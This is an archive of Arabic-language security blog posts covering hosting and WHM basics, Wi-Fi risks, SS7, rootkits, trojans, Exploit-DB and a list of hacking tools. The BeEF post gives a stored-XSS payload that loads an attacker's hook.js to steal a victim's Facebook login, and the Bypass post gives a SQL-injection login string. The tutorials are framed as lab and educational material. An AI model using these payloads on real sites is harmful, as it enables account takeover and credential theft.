الأحد، 6 يونيو 2021

ماهي الإستضافة ؟

 ماهي الإستضافة ؟

ماهو الفرق بين cPanel و WHM ؟

وماهو الفرق بين السيرفر والريسلر والـ vps (الخادم التخيلي) ؟

وسنذكر بعض الاوامر اللتي نستخدمها بشكل مستمر في ادارة السيرفر WHM

الإستضافة:

هي المساحه التي يوجد بداخلها الملفات الخاصه بالموقع على جهاز كمبيوتر شغال 24 ساعة  يسمى بـ السيرفر يستطيع الزوار الوصول لملفات الموقع و تصفح موقعك في اي وقت

وهناك عدة انواع حسب النظام سواء كان ويندوز او لينكس

واليوم بنتكلم عن استضافة سيرفرات اللينكس او المصدر المفتوح

ماهو الفرق بين cPanel و WHM ؟

بشكل مختصر :

الـ WHM هي للأشخاص الذين يقومون بإدارة الخوادم (اصحاب شركات الاستضافة)

الـ CPanel هي للاشخاص الذين يقومون بإدارة موقعهم وهي لوحة تخرج من لوحة WHM

الـ WHM كاملة السيطرة الإدارية على الخادم

الـ Reseller WHM – المستوى المقيد من الرقابة الإدارية على الخادم

الـ cPanel – تقييد مستوى العميل من حقوق المسؤول إلى ميزات لإدارة حساباتهم الفردية كما هو محدد من قبل مسؤول الخادم أو المورد

ماهو الفرق بين السيرفر والريسلر والـ vps (الخادم التخيلي) ؟

السيرفر SERVER :

عبارة عن جهاز كمبيوتر كامل ..يشمل الهارد ديسك والرام والمعالج و و و و ....، ويتصل بالانترنت بسرعات عالية تبدأ من 50 ميجا وحتى 500 واكثر وتختلف من داتا سنتر لاخرى .

الصلاحيات : عند استئجارك سيرفر من احد مراكز المعلومات " Data Centers "

يكون لك كامل التحكم في السيرفر ابتداءا بعمل reboot " اعادة تشغيل " في اي وقت وحتى تغيير نظام التشغيل كاملا وبالتأكيد تنصيب كافة البرامج المتوافقة مع نظام التشغيل

أو حتى طلب تغيير الهارد ديسك / الميموري ..الخ

الريسلر : Reseller : الموزع

التعريف : هو عبارة عن اقتطاع جزء محدد من السيرفر  5 جيجا مثلا

واعطائه لأحد الاشخاص مع صلاحيات اعادة توزيع مساحات صغيرة محتسبة من داخل ال 5 جيجا الخاصة به

طبعا الريسلر يمكنه فقط اعادة بيع المواقع العادية ..ولا يمكنه انشاء حسابات ريسلر

الصلاحيات : صاحب الريسلر حقيقة لا يمتلك اي صلاحيات للتحكم في السيرفر

فقط هو يعيد توزيع المساحات لعملائه

ولكنه مثلا لا يستطيع القيام بتركيب اي برامج على سيرفر متعلقة بنظام التشغيل

او لا يستطيع القيام بتحديث البرامج العاملة على السيرفر كال SQL SERVER مثلا

المميزات :

يكون متاح له كامل طاقة المعالج الموجود على السيرفر وكامل طاقة الرام

بمعنى انه لكامل مواقعه الحرية في استخدام طاقة السيرفر

وممكن موقع واحد فقط عنده يؤدى الى بطء السيرفر كامل وهكذا

ولهذا دائما ما تحدث خلافات بين صاحب السيرفر وبين صاحب الريسلر

لفي بي اس VPS | VDS : Virtual ( Private/Dedicted Server ( الخادم التخيلي )

التعريف : هو عبارة عن جزء تخيلي من السيرفر

بمعنى انه يكون هناك سيرفر بمواصفات قوية

مثلا 2 هارد ديسك كل منهما 500 جيجا

ورامات 16 جيجا ومعالجات Dual Xeon

ويتم تقسيم هذا السيرفر الى "سيرفرات تخيلية صغيرة" بداخل السيرفر الكبير 

بحيث يكون كل جزء معزول عزل حقيقي عن البقية

على عكس الريسلر

بمعنى ان كل سيرفر تخيلي يخصص له جزء لا يستطيع تخطيه من موارد السيرفر 

وهو يختلف عن الريسلر في هذه الحالة

الصلاحيات : اغلب شركات VPS توفر صلاحيات الرووت " صاحب السيرفر " كاملة 

بمعنى ان صاحب الـ VPS يتمتع ب 90 % من صلاحيات صاحب السيرفر كتركيب البرامج وازالتها من السيرفر ...ولكن يتبقى بعض الاعدادت الخاصة بنواة نظام التشغيل لا يمكن لصاحب الفي بي اس ان يقوم بالتعديل عليها

لأنه في الاساس السيرفر يكون عليه اكثر من VPS

كما يمكن لصاحب VPS ان يعيد تشغيل سيرفره في اي وقت

طبعا لا يكون هذا reboot حقيقي للسيرفر وانما يكون اعادة تشغيل محددة للـVPS

يمكن لصاحب الـVPS ان يقوم بتوزيع الريسلرات او المواقع كصاحب السيرفر تماما

هناك بعض الاوامر اللتي نستخدمها بشكل مستمر في ادارة السيرفر WHM

وبما ان الاوامر كثير تم اختيار الاوامر التي يجب على كل مدير سيرفر معرفتها

القسم الاول :

Service Status   عرض حالة السيرفر

Server Information   معلومات السيرفر

من هنا تقدر تعرف مواصفات السيرفر والرام وسرعة السيرفر ..

List Accounts: قائمة المواقع 

القسم الثاني :

View Bandwidth Usage: مراقبة الترافيك المستخدم من قبل المواقع

القسم الثالث:

List Suspended Accounts: عرض المواقع الموقوفه

القسم الرابع:

Show Accounts over Quota: اظهر المواقع التي تجاوزت الحد المسموح من المساحه او الترافيك

القسم الخامس :

List Subdomains: عرض الدومينات الفرعيه المستخدمه

الخيار الثالث:

Account Functions : خيارات حساب المواقع

القسم الاول:

Create a New Account: انشاء حساب جديد

هذا القسم تقريبا اهم قسم وهو انشاء حساب موقع جديد

السبت، 5 يونيو 2021

مخاطر استخدام شبكة Wi-Fi عامة

 ما هي مخاطر استخدام شبكة Wi-Fi عامة؟ 

━━━━━━━━━━━━━

تكمن مشكلة شبكات Wi-Fi العامة في وجود عدد هائل من المخاطر المصاحبة لهذه الشبكات. بينما قد يعتقد أصحاب الأعمال أنهم يقدمون خدمة قيمة لعملائهم ، إلا أن هناك احتمالية أن يكون الأمان على هذه الشبكات ضعيفًا أو غير موجود.

 رجل في الهجمات الوسطى

يُطلق على أحد التهديدات الأكثر شيوعًا على هذه الشبكات هجوم رجل في الوسط (MitM). في الأساس ، هجوم MitM هو شكل من أشكال التنصت. عندما يقوم الكمبيوتر بإجراء اتصال بالإنترنت ، يتم إرسال البيانات من النقطة A (الكمبيوتر) إلى النقطة B (الخدمة / موقع الويب) ، ويمكن أن تسمح نقاط الضعف للمهاجم بالدخول بين عمليات الإرسال هذه و "قراءتها". لذا فإن ما كنت تعتقد أنه خاص لم يعد كذلك.

 شبكات غير مشفرة

يعني التشفير أن الرسائل التي يتم إرسالها بين جهاز الكمبيوتر الخاص بك والموجه اللاسلكي هي في شكل "رمز سري" ، بحيث لا يمكن قراءتها من قبل أي شخص ليس لديه مفتاح فك الشفرة. يتم شحن معظم أجهزة التوجيه من المصنع مع إيقاف التشفير افتراضيًا ، ويجب تشغيلها عند إعداد الشبكة. إذا قام أحد متخصصي تكنولوجيا المعلومات بإعداد الشبكة ، فمن المحتمل أن يكون قد تم تمكين التشفير. ومع ذلك ، لا توجد طريقة مؤكدة لإطلاق النار لمعرفة ما إذا كان هذا قد حدث.

 توزيع البرامج الضارة

بفضل نقاط الضعف في البرامج ، هناك أيضًا طرق يمكن للمهاجمين من خلالها تمرير البرامج الضارة إلى جهاز الكمبيوتر الخاص بك دون علمك. الثغرة الأمنية في البرامج هي ثغرة أمنية أو ضعف موجود في نظام التشغيل أو البرنامج. يمكن للقراصنة استغلال هذا الضعف عن طريق كتابة تعليمات برمجية لاستهداف ثغرة أمنية معينة ، ثم حقن البرامج الضارة في جهازك.

التنقب والاستنشاق

التطفل على شبكة Wi-Fi والاستنشاق هو ما يبدو عليه الأمر. يمكن لمجرمي الإنترنت شراء مجموعات برامج خاصة وحتى أجهزة لمساعدتهم في التنصت على إشارات Wi-Fi. يمكن أن تسمح هذه التقنية للمهاجمين بالوصول إلى كل ما تفعله عبر الإنترنت - بدءًا من عرض صفحات الويب الكاملة التي قمت بزيارتها (بما في ذلك أي معلومات ربما تكون قد ملأتها أثناء زيارة صفحة الويب هذه) إلى القدرة على الحصول على بيانات اعتماد تسجيل الدخول الخاصة بك ، وحتى القدرة على ذلك خطف حساباتك.

 النقاط الساخنة الخبيثة

تخدع "نقاط الوصول المارقة" الضحايا للاتصال بما يعتقدون أنه شبكة شرعية لأن الاسم يبدو ذا سمعة طيبة. لنفترض أنك تقيم في Goodnyght Inn وتريد الاتصال بشبكة Wi-Fi بالفندق. قد تعتقد أنك تختار الخيار الصحيح عندما تنقر على "GoodNyte Inn" ، لكنك لم تفعل ذلك. بدلاً من ذلك ، لقد اتصلت للتو بنقطة اتصال مارقة أنشأها مجرمو الإنترنت الذين يمكنهم الآن عرض معلوماتك الحساسة.

الخميس، 3 يونيو 2021

BeEF

 موضوع اليوم سوف يكون عن سيناريو XSS عبر أداة BeEF. هذه الأداة اختصار لـ”BrowserExploitation Framework” وهي تخص ثغرات المتصفح بشكل عام. الأداة تقوم بإنشاء ملف “Hook” يحتوي على كود JavaScript خبيث والغرض منه التحكم بمتصفح الضحية, والأداة تقوم بتشغيل سيرفر Apache حيث يوضع هذا الملف.


إذا سوف نقوم بوضع هذا الملف بداخل موقع مصاب بثغرة XSS, من خلال اضافة script tag

لهذا المثال, سوف أستخدم “bWAPP” وهو اختصار لـ”buggy web application” وهذاالموقع هو تطبيق ويب مجاني ومفتوح المصدر وأي شخص يستطيع أن يقوم بتثبيته على جهازه لإكتشاف الثغرات المتاحة عليه وتعلم كيف تعمل هذه الثغرات.

المعلومة الثانية هي رابط ملف الـ”hook” والذي سوف يكون:


http://IP:3000/hook.js

ونستبدل كلمة IP, بـIP الجهاز الي سيقوم بالهجوم.

سوف تعطينا beef مثال لـXSS وهنا سنستخدم الـPayload


<script src=http://10.0.2.4/hook.js></script>


والآن نبحث عن ثغرة Stored XSS حتى نخزن الـ”hook” في الموقع المصاب, ونتحكم بمتصفح أي شخص يزور الرابط الذي يحتوي على الـhook. هنا يأتوي دور bWAPP حيث توجد صفحة معينة عليها ثغرة Stored XSS, حيث أنها تسمح للمستخدم أن يدخل نص معين في مدونة, والموقع لا يقوم بالتحقق من النص, لذلك ندخل تاق سكريبت يشير إلى ملف الـhook الخاص بـbeef, والذي يحتوي على اكواد JavaScript.


نقوم بإضافة entry جديد للمدونة في bWAPP:


بعد الإضافة, نلاحظ أن كلمة “test” ظاهرة لنا, ولكن السكريبت مخفي حيث أن الصفحة نفذت السكريبت ككوماند أو أمر, وليس كنص. ونثبت ذلك بالذهاب لواجهة beef:


هنا تم إضافة المتصفح الخاص بنا حيث أن bWAPP نفذ الكود في متصفحنا. إذاً، نستطيع الآن أن نعطي الرابط للضحية و متصفح الضحية سوف يقوم بتنفيذ الكود الذي يحتوي على beef hook ثم سيظهر لنا BeEF متصفح الضحية:


إذًا حصلنا على متصفح الضحية عبر موقع إلكتروني مصاب بثغرة Stored XSS وذلك بمجرد زيارته للصفحة المخترقة.

تٌمكننا beef من أن نقوم بالعديد من الخدع بعد الحصول على متصفح الضحية, وفي هذا المثال سوف ارسل عنصر “div” جديد في متصفح الضحية يطلبه الإيميل وكلمة المرور لموقع Facebook

وهكذا حصلنا على بيانات الضحية دون علمه, لأن الطلب يبدو وكأنه قادم من موقع bWAPP.


ملاحظة: يوجد العديد من الخدع والهجمات في beef ولكن هذا مثال واحد منها, أيضا نستطيع أن نرسل طلب login لأي موقع أخر. نستطيع أيضا أن نرسل trojan أو أي ملف خبيث لمتصفح الضحية حتى يقوم بتنزيله مباشرة، بالإضافة إلى التحديثات الوهمية وغيرها.

SS7

نظام التشوير رقم 7 (أو نظام التشوير رقم 7 ، SS7) عبارة عن مجموعة من بروتوكولات الإشارات الهاتفية التي تم تطويرها في عام 1975 ، والتي تُستخدم لإعداد المكالمات الهاتفية وإيقافها في معظم أجزاء شبكة الهاتف العامة العالمية ( PSTN). ينفذ البروتوكول أيضًا ترجمة الأرقام وإمكانية نقل الأرقام المحلية والفواتير المدفوعة مسبقًا وخدمة الرسائل القصيرة (SMS) والخدمات الأخرى.

غالبًا ما يشار إلى SS7 في أمريكا الشمالية باسم نظام تشوير القنوات المشترك 7 (CCSS7). في المملكة المتحدة ، يُطلق عليه C7 (رقم CCITT 7) ورقم 7 وإشارات القنوات المشتركة بين المكاتب 7 (CCIS7). في ألمانيا ، يُطلق عليه غالبًا Zentraler Zeichengabekanal Nummer 7 (ZZK-7).

تم تعريف بروتوكول SS7 للاستخدام الدولي من خلال توصيات سلسلة Q.700 لعام 1988 من قبل قطاع تقييس الاتصالات ITU-T. [1] من بين العديد من المتغيرات الوطنية لبروتوكولات SS7 ، يعتمد معظمها على متغيرات موحدة من قبل المعهد الوطني الأمريكي للمعايير (ANSI) والمعهد الأوروبي لمعايير الاتصالات (ETSI). المتغيرات الوطنية ذات الخصائص اللافتة للنظر هي المتغيرات الوطنية الصينية واليابانية للجنة تكنولوجيا الاتصالات (TTC).

حددت فرقة عمل هندسة الإنترنت (IETF) مجموعة بروتوكولات SIGTRAN التي تنفذ بروتوكولات المستويات 2 و 3 و 4 المتوافقة مع SS7. يُطلق عليه أحيانًا اسم Pseudo SS7 ، ويتم وضعه في طبقات على آلية نقل بروتوكول نقل التحكم في الدفق (SCTP) للاستخدام على شبكات بروتوكول الإنترنت ، مثل الإنترنت.


Bypass

 ما هي ثغرة Bypass ؟

ثغرة Bypass هي من الثغرات المشهورة والتي قد تمنح للهكر الدخول الى لوحة تحكم الادمن بدون معرفة اسم المستخدم وكلمة سر

لماذا تحدث ثغرة Bypass ؟

ان هذه الثغرة تظهر في المواقع بسبب عدم فلترة ملف ال php الذي يتحكم بالداتابيس او بصورة اخرى تحدث لعدم برمجة ملف php بصورة جيدة

اين توجد ثغرة Bypass بالموقع؟

تتركز هذه الثغرة في لوحة تسجيل دخول الادمن للموقع

كيفية استغلال الثغرة ؟

بكل بساطة ادخل الاتي في اسم المستخدم وكلمة السر  وستدخل للموقع

'=''or'

او ادخل كلمة admin في الحقلين

التشابه بين Bypass و Sql:

هذه الثغرتين تحدث لعدم برمجة او فلترة المعلومات الداخلة الى الداتابيس فأن Bypass تسجل الدخول الى الموقع عبر username و password اما sql فأنها تستغل ال id وغيرها

الأربعاء، 2 يونيو 2021

Exploit database

 شرح موقع Exploit database : أكبر قاعدة بيانات للتغرث

المحتوى

1.مفهوم الثغة البرمجية 

2. واجهة موقع Exploit-db

1.2نوع الثغرة 

 2.2 المنصة

3.2 عن طريق البورت 

مثال 

خلاصة :

 مرحبا بكم أصدقائي في هذا الدرس الجديد على مدونتكم Jsecurity Lab ، اليوم سنتعرف على موقع exploit database ، ما هو ؟ و كيف يعمل ؟

في هده التدوينة سنحاول ان نعطي فقط نبدة بسيطة عن موقع exploit-db ، و كيف يمكنك البحث عن الثغرات من خلاله .

اولا موقع exploit database هو عبارة عن قاعدة بيانات لثغرات الموجودة و التي يتم اكتشافها،  حيث يحتوي الموقع على الآلاف الثغرات، و مرتبة و منظمة بطريقة رائعة جدا، يمكنك البحث في الموقع بكل بساطة و سلاسة. 

1.مفهوم الثغة البرمجية

حسب ويكيبيديا الثغرة البرمجية  هي " مصطلح يطلق على مناطق ضعيفة في أنظمة تشغيل الحاسب، هذه المناطق الضعيفة يمكن التسلل عبرها إلى داخل نظام التشغيل، ومن ثم يتم التعديل فيه لتدميره نهائيا مثلا، أو للتجسس على المعلومات الخاصة لصاحب الحاسب الالي المخترق، أو ما يعرف بجهاز الضحية. تظهر الثغرات الأمنية في جميع البرمجيات أيضا وليس فقط أنظمة التشغيل وهي بسبب أخطاء برمجية أثناء تطويرها ارتكبها المطورين وهي تشكل خطرا أمنيا بسبب عدم اكتشافها احيانا لإصدار حل وترقيع لها مثل ثغرات اليوم الصفر ،التي دائماً ما يستعين بها القراصنة في جرائمهم الإكترونية.".

2. واجهة موقع Exploit-db

موقع exploit database يوفر واجهة بسيطة للمستخدم ، اذ يوفر لك مجموعة من الاقسام للبحث عن التغرات التي تريدها بكل سهولة .

عند الدخول الموقع ، ستجد في الصفحة الرئيسية أحدث التغرات المكتشفة.

يمكنك الضغط على filters ، لعمل فرز ، و البحث عن الثغرة التي تبحث عنها حسب الخيارات التي يوفرها لك الموقع .

يمكنك ان تبحث عن الثغرة  في الموقع سواء عن طريق:

نوع الثغرة type ؛

 المنصة platform ؛

الكاتب author ؛

المنفد أو port ؛

  اسم الثغرةtag

موقع :

https://www.exploit-db.com/

RootKits

 السلام عليكم 

في البوسط ديال اليوم انحاول نتعرفو على Rootkit شنو هي ؟ والاستراتيجية لي كيستخدمها المهاجم باش باش اوصل لجهاز الضحية ؟ وكيفية الوقاية  من هاد الهجوم ؟ وكيفاش غتعرف واش الجهاز ديالك مصاب ب Rootkit ؟ هادي اسئلة واخرى انحاولو نجاوبو عليها فهاد البوسط ان شاء الله .

شنو هي ال RootKits  هي برمجيات كتعمل بشكل مخفي وكتقوم باخفاء برمجيات اخرى بحال Virus وبرمجيات التجسس Spyware في جهاز الضحية وكتستخدم الطبقات الدنيا من انضمة الشغيل , وفي الغالب كتكون على شكل ملف كيوصلك في الاميل ولا كيجي مع برنامج تيليشارجيتيه وكستخدمو المهاجمين اساليب في الخداع باش اقوم الضحية بتشغيل داك الملف على الجهاز ديالو وكيتصاب مباشرة ب Rootkit , وRootkit بصفة عامة ماشي شي حاجة خايبة فيها بزااف دالمزايا وكتستخدم في اشياء ايجابية , لكن الانسان هو لي خايب لانه كيستخدها بطريقة سلبية اما Rootkit كتقنية فهي شي حاجة ايجابية وفيها فائدة .

اما بالنسبة لمصطلح RootKit فهو جا من انضمة تشغيل Unix والانضمة الشبيهة لها بحال Linux وكلمة Root كتعني مدير الحزم في انضمة Unix و Kit فهي كتعني العدة او مجموعة من الادوات , وعلى الرغم من هادشي فان Rootkit مكتقتصرش على انضمة Unix والانضمة الشبيهة لها بحال Linux فهي كتشمل انضمة تشغيل اخرى بحال MacOs و Windows بمختلف الاصدارات ديالهم .

ال Rootkit كتعطي للمهاجم كامل الصلاحيات للوصلو لموارد وملفات النضام ديال الجهاز الضحية فالمهاجم امكن ليه يقرى كل الملفات لي كايني في الجهاز بحال الملفات والصور والفيديوهات والتسجيلات الصوتية وامكن ارسل نسخ منها عبر الانترنيت لجهاز اخر , وايضا كتعطيه الصلاحية يشغل كل  ادوات الجهاز بحال الميكروفون ويسجل تسجيلات صوتية ويسبيفطها لجهاز اخبر عبر الانترنيت ولا يمكن ليه اشغل الكامير وياخد صور اولا فيديوهات ويسيفطها لجهاز اخر ويمكن ليه ايضا اشوف الحسابات لي مسجلة فهاد الجهاز ويشوف الباسوورد الى كانت مسجلة في المتصفح ديالك , وياض الى كان الجهاز متصل بالانترنيت فممكن المهاجم اشوف شاشة الجهاز يعني يراقب التحركات ديالك في الشاشة فين تدخل معمن تتكونيكطا فين تتفرج ولكن شريطة اكون اتصال بالانترنيت , وهادشي كيخلي Rootkit من اخطر انواع البرمجيات وكتشبه لواحد الدرجة Trojan احصنة طروادة لي دوينا عليها في من قبل .

السؤال شتة هي الاستراتجيات لي كيعتامدو عليها المهاجمين باش اقومو باصابة جهاز الضحية ب  Rootkit ؟

المهاجمين مكايعتامدوش على استراتجية محددة ولكن كل مهاجم كيعتامد على استراتجية معينة وغنتعرفو على بعض هاد الاستراتجيات :

من الاستراتجيات لي كيعتامدو عليها المهاجمين هي استغلال الثغراث في انضمة التشغيل الخاص بالجهاز الضحية فالمهاجم كيستغل ثغرات تتكون في نضام التشغيل باش اقوم بتنصيب Rootkit في الجهاز والقيام بالهجوم , هاد الاستراتجية صعيبة وتتحتاج لتقنيات وقدرات عالية فصعيب تلقى ثغرة فانضمة التشغيل لانه صائدو الثغرات كيكتشفو الثغرات وكيبلغو عليها وكتصاوب لكن هاد الاستراتيجية تتستخدم في الاختراقات الكبرى مثلا اختراق شركة عملاقة اولا اختراق منضمات كبيرة فهنا هاد الشركات والمنضمات الكبيرة تتاخد احتياطات صارمة جدا فميمكنش مثلا تخدم معاها استراتيجية الهندسة الاجتماعية فهنا الحل هو نضام الشغيل فكيقلبو على ثغرات ولا كيشريوها من Dark Web .

من الاستراتجيات الاخرى لي كيعتامدو عليها المهاجمين هي الهندسة الاجتماعية Social Engineering وكيعتامدو على اساليب الهندسة الاجتماعية  باش اقومو بخداع الضحية بتشغيل ملف كيرسلوه ليه في الاميل فهاد الاستراتيجية كيقومو بيها على الناس العاديين لي ماشي شركات ومعندهومش معرفة بالمجال فهاد الاستراتيجية ميمكنش تعاتمدها على شركة اولا واحد عارف في المجال مستحيل فهنا كيستخدمو اساليب ذكية جدا في الخداع وفي الاخير كيخدم الملف وكيتصاب الجهاز ب Rootkit , هادو من الاساليب لي كيتسخدموها وكايني اساليب اخرى لكن البوسط لا يسع ذكر كل الاستراتجيات .

شنو كيدير المهاجم بعد ما كيتصاب جهاز الضحية ب Rootkit ؟ 

اول حاجة كيقوم بها المهاجم هو كيحاول اخفي الاثار ديال الاختراق باش الضحية ميكتاشفش بلي تم اختراق للجهاز فكمثال كتقوم Rootkit بالاخفاء ديال اي عملية في Process وايضا كيقوم باخفاء الملفات لي حكها المهاجم في الجهاز وكيقوم ايضا بالتعديل على اوامر النضام باش تعطي نتائج مزورة للضحية باش ميعيق بتا شي تغيرات كتوقع في النضام .

من بعد اخفاء ادلة ديال حدوث اختراق للجهاز الان المهاجم كيبدا الخدمة وكيحاول احل بوابات خلفية Backdoors في النضام باش اقوم المهاجم بارسال البيانات منها وباش اتحكم في الجهاز ومن الطرق لي كيستخدمو في هاد القضية وهي كيفتح قناة اتصال SSH كتمنح للمهاجم الامكانية باش اوصل للجهاز وباش اتحكم بيه .

ومن بعد كيقوم المهاجم بمراقبة وبحث وتصنيف الملفات والوثائق لي كاينة في الجاهز وكيصنفها على حساب الاهمية بالنسبة ليه وكياخد نسخ من الملفات لي كتهمو وكيرسلها عبر الانترنيت .

ومن بعد كيشوف المهاجم الحسابات الالكترونية لي مفتوحة فالجهاز بحال حسابات مواقع التواصل ومعلومات البطاقات البنكية لي خدمها الضخية في الجهاز .

كيفاش تقوم بوقاية الجهاز ديالك من هاد الهجمات ؟ 

اول حاجة هي حاول تقوم بتحديث نضام التشغيل ديالك بصفة دورية باش تقوم بتغطية الثغرات وتفادا تخدم بنسخ من انضمة الشتغيل تم رفع الدعم عليها بحال مثلا في ويندوز Windows 7 .

حاول تفادا تقوم بتنصيب برامج غير معروفة المصدر ولا تم التحميل ديالها من اماكن غير رسمية وحاول تحمل الملفات من المواقع الرسمية فقط .

حاول متوقعش ضحية لاساليب الهندسة العكسية فمثلا حطيتي بوسط في فيسبوك محتاج كراك لبرنامج معين وكيوصلك اميل غير معروف وقال هاد الكراك صالح لهاد البرنامج .

حاول تخدم كلمة سر قوية للجهاز ديالك وميكون تا واحد عارفها .

متخليش الحاسوب ديالك مفتوح للناس لي مكتيقش فيهم حيت في ثواني ممكن اتيليشارجي ملف فيه Rootkit ويخدمو في الجهاز .

حاول تفادا البرامج لي ممعروفاش وعندها هاد الامتدادات .bat ولا .vbs  ولا .mdb ولا .wsf ...

الى هنا كنكونو وصلنا للنهاية ديال هاد البوسط كنتمنا تكونو ستافدتو منو ولو معلومة .

والسلام

لادوات التي استعملت في مسلسل الهاكر Mr robot

 جئت لكم بادوات اختراق رائعة و هي كل الادوات التي استعملت في مسلسل الهاكر Mr robot ، و هي كالتالي:

Information Gathering

Nmap

Setoolkit

Host To IP

WPScan

CMS Scanner

XSStrike

Dork – Google Dorks Passive Vulnerability Auditor

Scan A server’s Users

Crips

Password Attacks:

Cupp

Ncrack

Wireless Testing:

Reaver

Pixiewps

Bluetooth Honeypot

Exploitation Tools:

ATSCAN

sqlmap

Shellnoob

commix

FTP Auto Bypass

JBoss Autopwn

Sniffing & Spoofing:

Setoolkit

SSLtrip

pyPISHER

SMTP Mailer

Web Hacking:

Drupal Hacking

Inurlbr

WordPress & Joomla Scanner

Gravity Form Scanner

File Upload Checker

WordPress Exploit Scanner

WordPress Plugins Scanner

Shell and Directory Finder

Joomla! 1.5 – 3.4.5 remote code execution

Vbulletin 5.X remote code execution

BruteX – Automatically brute force all services running on a target

Arachni – Web Application Security Scanner Framework

fsociety Private Web Hacking:

Get all websites

Get Joomla websites

Get WordPress websites

Control Panel Finder

Zip Files Finder

Upload File Finder

Get server users

SQli Scanner

Ports Scan (range of ports)

ports Scan (common ports)

Get server Info

Bypass Cloudflare

Post Exploitation:

Shell Checker

POET

Weeman

Trojan Horses

 شنو كتعرفو على Trojan Horses او ما يعرف باحصنة طروادة ؟ كيفاش تيخدم ؟ شنو هو الانواع ديالو ؟ وطرق الاصابة ديالو ؟ وكيفاش نحميو راسنا منو ؟ هادي اسئلة واخرى غنحاول نجاوبو عليها فهاد البوسط ان شاء الله .

لكن اولا علاش تسمى بهاد الاسم حصان طروادة ؟ الجواب لانه كيخدم بالطريقة لي استعملوها الاغريق في فتح مدينة طروادة لي كانت محصنة جدا اوستعصا عليهم الفتح ديالها بالحرب او بالطرق الكلاسيكية , فاستخدمو الذكاء ديالهم وبناو مجسم كبير على شكل حصان من الخشب وخاوي من الداخل ديالو وعمروه بالجنود وحطوه حدا بوابة مدينة طروادة , ودخلوه صحاب مدينة طروادة وفي اليل خرجو الجنود من المجسم وفتحو ابواب المدينة للجنود الاغريقية وقامو باحتلال مدينة طروادة ولكن هادا ماشي الموضوع ديانا .

التروجان هو البرنامج خطير بزااف الاخطر فيه انه كيكون فجهاز الضحية بدون ميسيق ليه الخبار وهاد التروجان كيدير خدمتو بلا متسيق ليه الخبار فكيسرق الملفات الشخصية وكيقوم بتدمير البيانات لي في الجهاز ديالك وكيجمع الباسوردات ديالك لي كتستخدمها في جميع الحسابات ديالك في الانترنيت بحال الفيسبوك ديالك والاميل و معلومات البطاقة البنكية ديالك الى كنتي كتشري بيها عن طريق الانترنيت .

مزيان ها حنا عرفنا هاد التروجان , ولكن هو كيفاش كيخدم ؟ برنامج التروجان كتكون فيه نسختين  الخادم و المستفيد , فالمهاجم كينشر نسخة الخادم على اي برنامج في الانترنيت وخصوصا البرامج غير معروفة المصدر او برامج تم تحميلها على مكان غير رسمي بحال لعبة او  اي برنامج ومني كيقوم الضحية بتحميل هاد البرنامج لي فيه التروجان الخادم وكيانسطاليه في الجهاز ديالو فكتخدم نسخة الخادم في الجهاز ديالك بدون العلم ديالك على طريقة حصان طروادة , فنسخة الخادم كتحاول تفتح ثغارات في الجهاز ديالك باش اتسقبل الاوامر من المهاجم فهنا المهاجم كيرسل نسخة المستفيد للجهاز ديالك عن طريق الانترنيت , وهنا كتبدا الخدمة ديال المعقول فالنسخة دالخادم كيرسل اميل للمهاجم فيه معلومات حول الجهاز بحال اسم الجهاز و Ip ديالو والمكان ديالو ونسخة الخادم كيقدر اخدم راسو واخا تطفي البيسي وتعاود تشعلو وفيه كلمة المرور .

السؤال لي كيطرح راسو دابا هو كيفاش كيثكاثر هاد التروجان ؟ هاد التروجان على عكس الفيروسات الاخرى لي كثكاثر اليا بدون تدخل الضحية فهاد التروجان كينتاقل يديويا عن طريق تبادل البرامج لي فيها هاد التروجان .

وشنو الامور لي كيقلب عليها المهاجم في الجهاز ؟ المهاجم كيستخدم الطروجان باش اوصل لمعلومات حساسة في الجهاز بحال ارقام البطاقات البنكية او الحسابات البنكية الالكترونية بحال بيبال او محفضات البتكوين وغيرها وكيبحث ايضا على الباسودر ديال الحاسبات لي تم التسجيل دياها في الجهاز بحال كيما قلنا الفيسبوك والبريد الالكتروني واخير معلومات الضحية بحال الصور والفيديوها باش اقدر ابتز الضحية ....  .

شنو هي انواع التروجان ؟ التروجان فيه بزااف دالانواع لكن اشهرهم 4 انواع وهما : Remote Administration Trojan و File Server Trojan و Password Sending Trojan و Spam Relaying Trojan هادو اشهر الانواع والى جينا نشرحوهوم هنا فغيكون البوسط طويل ومممل بزااف لكن انشاء الله نخصصو ليهم بوسط بوحدهوم .

شنو الطرق لي كيستخدما المهاجم باش اوصل التروجان للجهاز ديالك ؟ كايني بزااف الطرق واندكروهوم بعجالة بدون الشرح ديالهم , فاغلب الاحيان المهاجم كيتسخدم البرامج وخصوصا لي ممعروفاش ولي معرفة وتيليشارججيتيها من مكان غير رسمي , لذالك ضروري تيليشاجي البرامج المعروفة فقط ومن الموقع الرسمي ديالها او من المواقع الموثوقة .ومن الطرق ايضا هو الدخول المباشر للجهاز دياك مثلا مريح فمقهي او فبلاصة وكتنوض للمرحاض وكتخلي الجهاز ديالك مفتوح هنا في دقيقية امشي للجهاز ديالك اتيليشارجي فايل صغير وها نتا مصيد لذالك متخليش الاجهزة ديالك مفتوحة ديما دير باسورد قوي للجهاز . هادو من اشهر الطرق لي كيستخدموها المهاجمين لكن كايني طرق اخرى .

دابا السؤال المهم وهو كيفاش نحمي راسي من التروجان ؟ باش تحمي راسك خاصك توفر اجهزة الحماية في الحاسوب ديالك وتحاول تستخدم فقط برامج معروفة في الحاسوب ديالك وعمرك تيليشارجي اي برنامج من اي بلاصة وتنصبو في الجهاز ديالك وايضا عمرك تعطي فرصة لاي شخص اوصل للحاسوب ديالك وخاصت تحمي الجهاز ديالك بال Firewall واخصك دير تحديث للنضام التشغيل واي برنامج باستمرار لانه فعبض البرامج كيم رفع الحماية و الدعم من النسخ القديمة من البرامج و ايضا الكراك شي حاجة خطيرة بزااف حاول تفاداها المهم حاول تبحث اكثر في الانترنيت على برامج فحص التروجان ومتصغرش من البيانات لي عندك في الجهاز وتقول ادودي اش غيديرو بالبيانات ديالي هادو بغاو شي حد عندو الفلوس لا ديما عتابر البيانات ديالك مهمة جدا وحافض عليها لانه تقدر تستخدم ضدك 

كنتمنا نكون فدتك ولو بمعلومة بسيطة .

والسلام 

الرادار

 كيف يعمل الرادار ؟

